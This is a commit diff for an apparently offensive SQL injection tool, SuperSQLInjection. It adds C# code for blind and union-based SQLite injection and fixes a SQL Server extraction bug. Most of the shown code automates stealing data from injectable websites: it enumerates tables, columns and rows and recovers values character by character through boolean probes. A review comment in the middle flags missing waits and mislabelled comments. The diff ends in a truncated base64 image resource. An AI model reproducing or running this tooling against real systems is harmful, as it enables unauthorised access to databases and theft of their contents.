update20190104

20190104 V1.0 正式版---
修复SQLServer盲注,由于表名替换错误,导致列获取不成功的问题。
优化配置文件。
新增支持SQLite数据库的注入,支持盲注和Union方式,暂不支持显错模式,SQLite支持3以上版本,如果是3以下版本,由于不支持部分函数,可能无法获取数据。
shack2
2019-01-04 17:53:34 +08:00
parent 623e41317e
commit aaae08f3e1
10 changed files with 656 additions and 182 deletions


@@ -105,6 +105,7 @@
this.tab_vers = new System.Windows.Forms.TabPage();
this.data_lvw_ver = new System.Windows.Forms.ListView();
this.data_lvw_ver_verName = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.data_lvw_ver_val = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.data_cms_vers = new System.Windows.Forms.ContextMenuStrip(this.components);
this.data_cms_tsmi_getVariable = new System.Windows.Forms.ToolStripMenuItem();
this.data_cms_tsmi_stopGetVariable = new System.Windows.Forms.ToolStripMenuItem();
@@ -171,9 +172,11 @@
this.txt_sencond_request = new System.Windows.Forms.TextBox();
this.groupBox3 = new System.Windows.Forms.GroupBox();
this.groupBox16 = new System.Windows.Forms.GroupBox();
this.label34 = new System.Windows.Forms.Label();
this.label4 = new System.Windows.Forms.Label();
this.txt_inject_showIndex = new System.Windows.Forms.TextBox();
this.label8 = new System.Windows.Forms.Label();
this.txt_inject_unionTemplate = new System.Windows.Forms.TextBox();
this.txt_inject_unionColumnsCount = new System.Windows.Forms.TextBox();
this.btn_inject_sendData = new System.Windows.Forms.Button();
this.btn_inject_clearRequest = new System.Windows.Forms.Button();
@@ -321,9 +324,6 @@
this.lbl_packsCount = new System.Windows.Forms.ToolStripStatusLabel();
this.timer_status = new System.Windows.Forms.Timer(this.components);
this.timer_scanInjection = new System.Windows.Forms.Timer(this.components);
this.data_lvw_ver_val = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.label34 = new System.Windows.Forms.Label();
this.txt_inject_unionTemplate = new System.Windows.Forms.TextBox();
this.gb_basic.SuspendLayout();
this.menuStrip_main.SuspendLayout();
this.gb_logo.SuspendLayout();
@@ -572,7 +572,8 @@
"SQLServer",
"Oracle",
"PostgreSQL",
"DB2"});
"DB2",
"SQLite"});
this.cbox_basic_dbType.Location = new System.Drawing.Point(489, 50);
this.cbox_basic_dbType.Name = "cbox_basic_dbType";
this.cbox_basic_dbType.Size = new System.Drawing.Size(87, 20);
@@ -1182,6 +1183,11 @@
this.data_lvw_ver_verName.Text = "变量名";
this.data_lvw_ver_verName.Width = 250;
//
// data_lvw_ver_val
//
this.data_lvw_ver_val.Text = "变量值";
this.data_lvw_ver_val.Width = 500;
//
// data_cms_vers
//
this.data_cms_vers.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
@@ -1509,7 +1515,7 @@
this.groupBox4.Controls.Add(this.data_dbs_lvw_data);
this.groupBox4.Location = new System.Drawing.Point(3, 6);
this.groupBox4.Name = "groupBox4";
this.groupBox4.Size = new System.Drawing.Size(577, 379);
this.groupBox4.Size = new System.Drawing.Size(578, 379);
this.groupBox4.TabIndex = 1;
this.groupBox4.TabStop = false;
this.groupBox4.Text = "获取数据";
@@ -1523,7 +1529,7 @@
this.data_dbs_lvw_data.GridLines = true;
this.data_dbs_lvw_data.Location = new System.Drawing.Point(3, 17);
this.data_dbs_lvw_data.Name = "data_dbs_lvw_data";
this.data_dbs_lvw_data.Size = new System.Drawing.Size(571, 359);
this.data_dbs_lvw_data.Size = new System.Drawing.Size(572, 359);
this.data_dbs_lvw_data.TabIndex = 1;
this.data_dbs_lvw_data.UseCompatibleStateImageBehavior = false;
this.data_dbs_lvw_data.View = System.Windows.Forms.View.Details;
@@ -1879,6 +1885,15 @@
this.groupBox16.TabStop = false;
this.groupBox16.Text = "Union注入取数据配置";
//
// label34
//
this.label34.AutoSize = true;
this.label34.Location = new System.Drawing.Point(10, 61);
this.label34.Name = "label34";
this.label34.Size = new System.Drawing.Size(65, 12);
this.label34.TabIndex = 1;
this.label34.Text = "填充模板:";
//
// label4
//
this.label4.AutoSize = true;
@@ -1907,6 +1922,17 @@
this.label8.TabIndex = 8;
this.label8.Text = "显示列:";
//
// txt_inject_unionTemplate
//
this.txt_inject_unionTemplate.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.txt_inject_unionTemplate.Location = new System.Drawing.Point(78, 58);
this.txt_inject_unionTemplate.MaxLength = 1000;
this.txt_inject_unionTemplate.Name = "txt_inject_unionTemplate";
this.txt_inject_unionTemplate.Size = new System.Drawing.Size(158, 21);
this.txt_inject_unionTemplate.TabIndex = 7;
this.txt_inject_unionTemplate.TextChanged += new System.EventHandler(this.txt_inject_unionTemplate_TextChanged);
//
// txt_inject_unionColumnsCount
//
this.txt_inject_unionColumnsCount.Location = new System.Drawing.Point(70, 22);
@@ -3376,31 +3402,6 @@
this.timer_scanInjection.Interval = 1000;
this.timer_scanInjection.Tick += new System.EventHandler(this.timer_scanInjection_Tick);
//
// data_lvw_ver_val
//
this.data_lvw_ver_val.Text = "变量值";
this.data_lvw_ver_val.Width = 500;
//
// label34
//
this.label34.AutoSize = true;
this.label34.Location = new System.Drawing.Point(10, 61);
this.label34.Name = "label34";
this.label34.Size = new System.Drawing.Size(65, 12);
this.label34.TabIndex = 1;
this.label34.Text = "填充模板:";
//
// txt_inject_unionTemplate
//
this.txt_inject_unionTemplate.Anchor = ((System.Windows.Forms.AnchorStyles)(((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Left)
| System.Windows.Forms.AnchorStyles.Right)));
this.txt_inject_unionTemplate.Location = new System.Drawing.Point(78, 58);
this.txt_inject_unionTemplate.MaxLength = 1000;
this.txt_inject_unionTemplate.Name = "txt_inject_unionTemplate";
this.txt_inject_unionTemplate.Size = new System.Drawing.Size(158, 21);
this.txt_inject_unionTemplate.TabIndex = 7;
this.txt_inject_unionTemplate.TextChanged += new System.EventHandler(this.txt_inject_unionTemplate_TextChanged);
//
// Main
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);


@@ -230,7 +230,7 @@ namespace SuperSQLInjection
return sid;
}
public static int version = 20190102;
public static int version = 20190104;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新
public void checkUpdate()
@@ -609,7 +609,6 @@ namespace SuperSQLInjection
}
public void getVariablesByUnionByDB2(Object v)
{
String[] sv = v.ToString().Split(':');
String pay_load = DB2.getUnionDataValue(config.unionFillTemplate, sv[1], "", "", "");
String result = getOneDataByUnionOrError(pay_load);
@@ -617,6 +616,15 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
public void getVariablesByUnionBySQLite(Object v)
{
String[] sv = v.ToString().Split(':');
String pay_load = SQLite.getUnionDataValue(config.columnsCount,config.showColumn, config.unionFill,sv[1]);
String result = getOneDataByUnionOrError(pay_load);
this.Invoke(new setVariableDelegate(setVariable), sv[0], result);
Interlocked.Increment(ref this.currentDataCount);
}
public void getVariablesByErrorByMySQL(Object v)
{
String[] sv = v.ToString().Split(':');
@@ -708,6 +716,9 @@ namespace SuperSQLInjection
case DBType.DB2:
stp.QueueWorkItem<String>(getVariablesByUnionByDB2, v);
break;
case DBType.SQLite:
stp.QueueWorkItem<String>(getVariablesByUnionBySQLite, v);
break;
}
}
stp.WaitForIdle();
@@ -812,6 +823,10 @@ namespace SuperSQLInjection
case DBType.DB2:
stp.QueueWorkItem<String>(getVariableByBoolByDB2, v);
break;
case DBType.SQLite:
//获取对应环境变量值
stp.QueueWorkItem<String>(getVariableByBoolBySQLite, v);
break;
}
}
stp.WaitForIdle();
@@ -1132,7 +1147,7 @@ namespace SuperSQLInjection
}
/// <summary>
/// 获取环境变量oracle bool
/// 获取环境变量DB2 bool
/// </summary>
/// <param name="vers"></param>
public void getVariableByBoolByDB2(Object vers)
@@ -1166,6 +1181,41 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取环境变量DB2 bool
/// </summary>
/// <param name="vers"></param>
public void getVariableByBoolBySQLite(Object vers)
{
try
{
String[] vs = vers.ToString().Split(':');
//判断变量长度
int len = getValueByStepUp(SQLite.bool_length.Replace("{data}", vs[1]), 0, 10);
this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info);
String va_payload = SQLite.bool_value.Replace("{data}", vs[1]);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
String dp = va_payload.Replace("{index}", i.ToString());
int ascii = getValue(dp, 32, 126);
value += (char)ascii;
this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
}
this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
delegate void addItemToListViewDelegate(ListViewItem item);
public void addItemToListView(ListViewItem item)
@@ -1886,6 +1936,43 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// bool方式获取表
/// </summary>
/// <param name="osn"></param>
public void getTableNameValueByBoolBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
int selectIndex = sn.tn.Index;
//判断当前表长度
String data_payload = SQLite.table_value.Replace("{index}", sn.limit + "");
int len = getValue(SQLite.bool_length.Replace("{data}", data_payload), 1, 50);
//判断当前数据库对应的ascii码
String va_payload = SQLite.bool_value.Replace("{data}", data_payload);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String tmp_va_payload = va_payload.Replace("{index}", i + "");
int ascii = getValue(tmp_va_payload, 0, 128);
value += ((char)ascii).ToString();
}
this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + value, LogLevel.info);
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table");
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentTableCount);
}
public void getTableNameValueByBoolBySQLServerSleep(Object osn)
@@ -2024,6 +2111,22 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// 获取表名多线程调用sqlite
/// </summary>
/// <param name="osn"></param>
public void getTableNameValueByUnionBySQLite(Object osn)
{
SelectNode sn = (SelectNode)osn;
String tables_value_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.table_value.Replace("{index}", sn.limit.ToString()));
String result = getOneDataByUnionOrError(tables_value_payload);
this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info);
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
Interlocked.Increment(ref this.currentTableCount);
}
/// <summary>
/// 获取表名多线程调用Oracle
/// </summary>
@@ -2231,7 +2334,6 @@ namespace SuperSQLInjection
}
}
return len;
}
/// <summary>
@@ -3016,6 +3118,20 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
//获取当前数据库长度
this.tableCount = getValueByStepUp(SQLite.bool_tables_count, 0, 50);
this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbname + "发现" + this.tableCount + "个表!", LogLevel.info);
for (int i = 0; i < this.tableCount; i++)
{
SelectNode sn = new SelectNode();
sn.tn = tn;
sn.limit = i;
stp.QueueWorkItem<SelectNode>(getTableNameValueByBoolBySQLite, sn);
}
stp.WaitForIdle();
break;
}
@@ -3130,6 +3246,23 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
//获取当前数据库表数量
tables_count_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.tables_count);
result = getOneDataByUnionOrError(tables_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info);
this.tableCount = Tools.convertToInt(result);
for (int i = 0; i < this.tableCount; i++)
{
SelectNode sn = new SelectNode();
sn.tn = tn;
sn.limit = i;
sn.dbname = dbName;
stp.QueueWorkItem<SelectNode>(getTableNameValueByUnionBySQLite, sn);
}
stp.WaitForIdle();
break;
}
}
@@ -3255,10 +3388,15 @@ namespace SuperSQLInjection
{
//获取环境变量
this.data_tvw_dbs.Nodes.Clear();
if (DBType.Access.ToString().Equals(this.cbox_basic_dbType.Text))
//没有库的数据库
if (DBType.Access.Equals(config.dbType))
{
addDBToTreeList(DBType.Access.ToString());
}
else if (DBType.SQLite.Equals(config.dbType))
{
addDBToTreeList(DBType.SQLite.ToString());
}
//检查注入配置
if (checkConfig())
{
@@ -3379,7 +3517,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3428,7 +3566,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3442,7 +3580,7 @@ namespace SuperSQLInjection
try
{
SelectNode sn = (SelectNode)osn;
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.columnName, "UTF-8")).Replace("{dbname}", sn.dbname);
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.tableName, "UTF-8")).Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLServer.bool_length.Replace("{data}", data_payload), 0, 10);
String value = "";
//获取值
@@ -3474,7 +3612,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3488,7 +3626,7 @@ namespace SuperSQLInjection
try
{
SelectNode sn = (SelectNode)osn;
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.columnName, "UTF-8")).Replace("{dbname}", sn.dbname);
String data_payload = SQLServer.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}..{table}'", Tools.strToChar(sn.dbname + ".." + sn.tableName, "UTF-8")).Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLServer.getBoolDataBySleep(SQLServer.bool_length.Replace("{data}", data_payload), config.maxTime), 0, 10);
String value = "";
//获取值
@@ -3531,7 +3669,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3568,7 +3706,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3604,7 +3742,47 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列明称,bool方式
/// </summary>
/// <param name="osn">表的节点</param>
public void getColumnNameByBoolBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
//判断当前长度
String data_payload = SQLite.column_value.Replace("'{table}'", Tools.strToChar(sn.tableName,"UTF-8","||")).Replace("{index}", sn.limit + "").Replace("{dbname}", sn.dbname);
int len = getValueByStepUp(SQLite.bool_length.Replace("{data}", data_payload), 1, 50);
//判断当前数据库对应的ascii码
String va_payload = SQLite.bool_value.Replace("{data}", data_payload);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String tmp_va_payload = va_payload.Replace("{index}", i + "");
int ascii = getValue(tmp_va_payload, 0, 128);
value += ((char)ascii).ToString();
}
List<String> columns = Tools.GetSQLiteColumns(value);
this.Invoke(new showLogDelegate(log), "表" + sn.tableName + "发现列:" + String.Join(",", columns), LogLevel.info);
foreach (String column in columns) {
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, column, "column");
}
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3628,12 +3806,12 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列名union MySQL
/// 获取列名union SQLServer
/// </summary>
/// <param name="osn"></param>
public void getColumnNameByUnionBySQLServer(Object osn)
@@ -3650,7 +3828,33 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
/// <summary>
/// 获取列名union SQLServer
/// </summary>
/// <param name="osn"></param>
public void getColumnNameByUnionBySQLite(Object osn)
{
try
{
SelectNode sn = (SelectNode)osn;
String column_Name_data = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill,SQLite.column_value.Replace("'{table}'",Tools.strToChar(sn.tableName,"UTF-8","||")));
String result = getOneDataByUnionOrError(column_Name_data);
//SQLite获取的列需要进行处理
List<String> columns = Tools.GetSQLiteColumns(result);
this.Invoke(new showLogDelegate(log), "发现列:" + String.Join(",",columns), LogLevel.info);
foreach (String column in columns) {
this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, column, "column");
}
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3738,7 +3942,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3754,7 +3958,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3770,7 +3974,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message, LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message, LogLevel.error);
}
}
@@ -3786,7 +3990,7 @@ namespace SuperSQLInjection
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取数据库名称时发生异常:" + e.Message,LogLevel.error);
this.Invoke(new showLogDelegate(log), "获取列名时发生异常:" + e.Message,LogLevel.error);
}
}
@@ -3918,6 +4122,13 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
SelectNode csn = new SelectNode();
csn.tn = ctn;
csn.tableName = tableName;
stp.QueueWorkItem<SelectNode>(getColumnNameByBoolBySQLite, csn);
stp.WaitForIdle();
break;
}
}
@@ -4039,6 +4250,12 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
SelectNode csn = new SelectNode();
csn.tn = ctn;
csn.tableName = tableName;
stp.QueueWorkItem<SelectNode>(getColumnNameByUnionBySQLite, csn);
break;
}
}
@@ -4454,6 +4671,69 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据
/// </summary>
/// <param name="pams">列名集合List及limit等参数</param>
public void getDataValueByBoolBySQLite(Object opam)
{
try
{
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = null;
foreach (String columnName in gp.columns)
{
//取每一列的值
String data_payload = SQLite.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
String payload_len = SQLite.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
int len = getValueByStepUp(payload_len, 0, 50);
String value = "";
//获取值
for (int i = 1; i <= len; i++)
{
//取值payload替换对应下标值
String unicode_data_payload = SQLite.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
//根据unicode值得长度确定范围在判断提高效率
for (int j = 3; j <= 7; j++)
{
Boolean isLarge = checkLen(SQLite.check_li_value.Replace("{data}", unicode_data_payload), j);
if (isLarge)
{
int end = (int)Math.Pow(10, j - 1) - 1;
int unicode = getValue(SQLite.bool_noUnicode_value.Replace("{data}", unicode_data_payload), 0, end);
value += Tools.unHexByUnicode(unicode, config.db_encoding);
break;
}
}
}
if (lvi == null)
{
lvi = new ListViewItem(value);
}
else
{
lvi.SubItems.Add(value);
}
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit + 1) + "行,"+columnName+"的值:"+ value, LogLevel.info);
}
this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit+1) + "行的值!", LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据
@@ -4803,6 +5083,29 @@ namespace SuperSQLInjection
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据union方式
/// </summary>
/// <param name="pams">列名集合List及limit等参数</param>
public void getDataValueByUnionBySQLite(Object opam)
{
try
{
GetDataPam gp = (GetDataPam)opam;
ListViewItem lvi = new ListViewItem();
String result = getOneDataByUnionOrError(SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.limit.ToString()));
this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
this.Invoke(new showLogDelegate(log), "获取到第" + (gp.limit+1) + "行的值!", LogLevel.info);
}
catch (Exception e)
{
this.Invoke(new showLogDelegate(log), "获取值发生异常:" + e.Message, LogLevel.error);
}
Interlocked.Increment(ref this.currentDataCount);
}
/// <summary>
/// 获取数据union方式
/// </summary>
@@ -5236,6 +5539,32 @@ namespace SuperSQLInjection
MessageBox.Show("没有这么多行数据,请改小点!");
}
break;
case DBType.SQLite:
isMax = findKeyInBody(SQLite.bool_datas_count.Replace("{table}", this.curren_table), start + dataCount);
if (isMax)
{
//下标从1开始
for (int i = 0; i < dataCount; i++)
{
GetDataPam gd = new GetDataPam();
gd.columns = columns;
gd.dbname = this.curren_db;
gd.table = this.curren_table;
gd.limit = start + i;
gd.isMuStr = config.isMuStr;
stp.WaitFor(100);
stp.QueueWorkItem<GetDataPam>(getDataValueByBoolBySQLite, gd);
}
stp.WaitForIdle();
}
else
{
MessageBox.Show("没有这么多行数据,请改小点!");
}
break;
}
@@ -5388,7 +5717,7 @@ namespace SuperSQLInjection
case DBType.Access:
datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, Access.data_count.Replace("{table}", this.curren_table)).Replace("{table}", this.curren_table);
datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, Access.data_count.Replace("{table}", this.curren_table));
result = getOneDataByUnionOrError(datas_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success);
@@ -5557,6 +5886,35 @@ namespace SuperSQLInjection
}
stp.WaitForIdle();
break;
case DBType.SQLite:
datas_count_payload = SQLite.getUnionDataValue(config.columnsCount, config.showColumn, config.unionFill, SQLite.data_count.Replace("{table}", this.curren_table));
result = getOneDataByUnionOrError(datas_count_payload);
this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success);
this.dataCount = Tools.convertToInt(result);
if (this.dataCount < (dataCount + start))
{
this.Invoke(new showLogDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!", LogLevel.waring);
this.data_dbs_txt_count.Text = this.dataCount.ToString();
break;
}
//下标从1开始
for (int i = 0; i < dataCount; i++)
{
GetDataPam gd = new GetDataPam();
gd.columns = columns;
gd.dbname = this.curren_db;
gd.table = this.curren_table;
gd.limit = start + i;
gd.isMuStr = config.isMuStr;
stp.WaitFor(100);
stp.QueueWorkItem<GetDataPam>(getDataValueByUnionBySQLite, gd);
}
stp.WaitForIdle();
break;
}
}
@@ -6246,7 +6604,6 @@ namespace SuperSQLInjection
}
if (list_columns.Count > 0)
{
this.data_dbs_lvw_data.Items.Clear();
}
this.currentDataCount = 0;
@@ -6353,12 +6710,10 @@ namespace SuperSQLInjection
{
this.file_cbox_readWrite.Enabled = true;
this.file_cbox_readWrite.Items.Add("请选择读写文件方式");
this.file_cbox_readWrite.Items.AddRange(list.ToArray());
this.file_cbox_readWrite.Items.AddRange(list.ToArray());
}
else {
this.file_cbox_readWrite.Items.Add("此数据库类型暂不支持文件读写!");
this.file_cbox_readWrite.Items.Add("此数据库类型暂不支持文件读写!");
}
}
catch (Exception ee) {
@@ -6389,24 +6744,16 @@ namespace SuperSQLInjection
public void loadVersToListView(DBType dbtype) {
List<String> vers = null;
switch (config.dbType)
try
{
case DBType.MySQL:
vers = MySQL.vers;
break;
case DBType.SQLServer:
vers = SQLServer.vers;
break;
case DBType.Oracle:
vers = Oracle.vers;
break;
case DBType.PostgreSQL:
vers = PostgreSQL.vers;
break;
case DBType.DB2:
vers = DB2.vers;
break;
Type type = Type.GetType("SuperSQLInjection.payload." + config.dbType.ToString());
vers = (List<String>)type.GetField("vers").GetValue(null);
}
catch (Exception e)
{
Tools.SysLog("loadVersToListView异常" + e.Message);
}
this.data_lvw_ver.Items.Clear();
if (vers!=null&& vers.Count>0)
{
@@ -7332,8 +7679,6 @@ namespace SuperSQLInjection
{
try
{
//取值payload替换对应下标值
//select UNICODE(substring(@@version,{index},1))
//取值payload替换对应下标值
String unicode_data_payload = SQLServer.unicode_value.Replace("{index}", index + "").Replace("{data}", SQLServer.file_content);
//取unicode转换后的长度
@@ -8903,7 +9248,7 @@ namespace SuperSQLInjection
private void ToolStripMenuItem_Click(object sender, EventArgs e)
{
MessageBox.Show("V1.1正式版----" + version);
MessageBox.Show("V1.0正式版----" + version);
}
private void data_dbs_tsmi_saveDTCStruct_Click(object sender, EventArgs e)
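Review bot: The new `case DBType.SQLite:` branch that queues `getColumnNameByUnionBySQLite` reaches `break;` without `stp.WaitForIdle();`, while the matching bool branch (queuing `getColumnNameByBoolBySQLite`) and the case directly above it both wait first. The enclosing method continues outside the hunk, so unless it waits again after the switch, the caller can proceed while the work item is still running; I would add `stp.WaitForIdle();` before that `break;`. The bool table branch has a similar asymmetry: it sets `sn.tn` and `sn.limit` but not `sn.dbname`, although `getTableNameValueByBoolBySQLite` logs `sn.dbname`, so the log line would carry an empty database name. The union branch already does `sn.dbname = dbName;`, and the bool branch should set `sn.dbname = dbname;` the same way. Separately, the `<summary>` comments on `getVariableByBoolBySQLite` and `getColumnNameByUnionBySQLite` still name DB2 and SQLServer and should say SQLite.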


@@ -126,110 +126,9 @@
<metadata name="data_cms_vers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>477, 17</value>
</metadata>
<metadata name="myicon_list.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>747, 17</value>
</metadata>
<data name="myicon_list.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAB6
FAAAAk1TRnQBSQFMAgEBCwIAAQgBAAEIARABAAEQAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
AUADAAEwAwABAQEAAQgGAAEMGAABgAIAAYADAAKAAQABgAMAAYABAAGAAQACgAIAA8ABAAHAAdwBwAEA
AfABygGmAQABMwUAATMBAAEzAQABMwEAAjMCAAMWAQADHAEAAyIBAAMpAQADVQEAA00BAANCAQADOQEA
AYABfAH/AQACUAH/AQABkwEAAdYBAAH/AewBzAEAAcYB1gHvAQAB1gLnAQABkAGpAa0CAAH/ATMDAAFm
AwABmQMAAcwCAAEzAwACMwIAATMBZgIAATMBmQIAATMBzAIAATMB/wIAAWYDAAFmATMCAAJmAgABZgGZ
